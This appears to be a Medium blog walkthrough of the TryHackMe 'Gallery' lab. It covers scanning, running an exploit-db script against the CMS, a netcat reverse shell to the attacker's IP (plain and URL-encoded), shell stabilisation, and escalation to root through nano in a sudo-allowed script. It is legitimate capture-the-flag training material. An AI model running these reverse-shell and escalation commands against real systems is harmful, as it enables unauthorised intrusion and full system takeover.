TryHackMe: Gallery

Today we will take a look at TryHackMe: Gallery. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

Question: How many ports are open?

Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.157.45

Question: What’s the name of the CMS?

Answer: S***** I**** G******

I searched for a suitable exploit and found it

Let’s exploit.

Command: locate 50214.py

Command: searchsploit -m /usr/share/exploitdb/exploits/php/webapps/50214.py

Command: python 50214.py

Get Reverse Shell

Command: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 4242 >/tmp/f

But first let’s encode

Command: rm%20-f%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.8.223.65%204242%20%3E%2Ftmp%2Ff%0A

Enter these commands after receiving the Reverse Shell

Command: script /dev/null -c bash

Command: export TERM=xterm

Command: ctrl+z

Command: stty raw -echo ; fg

Command: reset

Let’s enumerate the machine with linpeas.sh.

Here we found the necessary credentials credentials

Let’s change the user.

Command: su mike

Privilege Escalation

Let’s look at the file rootkit.sh

Here we can use nano to get a shell. Let’s take a look at this

Command: sudo -u root /bin/bash /opt/rootkit.sh

Command: read

Command: CTRL+R

Command: CTRL+X

Command: reset; sh 1>&0 2>&0

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Non-TechTeam Proof of Work, November 2021

Getting started with analytics in your Android application

Automated CI/CD with Jenkins

Is Udemy’s The Web Developer Bootcamp 2022 by Colt Steele worth it? [Review]

Udemy’s The Web Developer Bootcamp By Colt Steele Review

Re-Accelerate: Measuring Performance

An old-fashioned set of market scales

Generic Data Sources in Swift

Setting Up A Modern Front-End Development Environment on macOS

Database-Driven Face Recognition P

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

TryHackMe: AttackerKB

Hack the Box — Beep Writeup

TryHackMe: [Day 2] Web Exploitation Elf HR Problems

TryHackme | Pickle Rick Walkthrough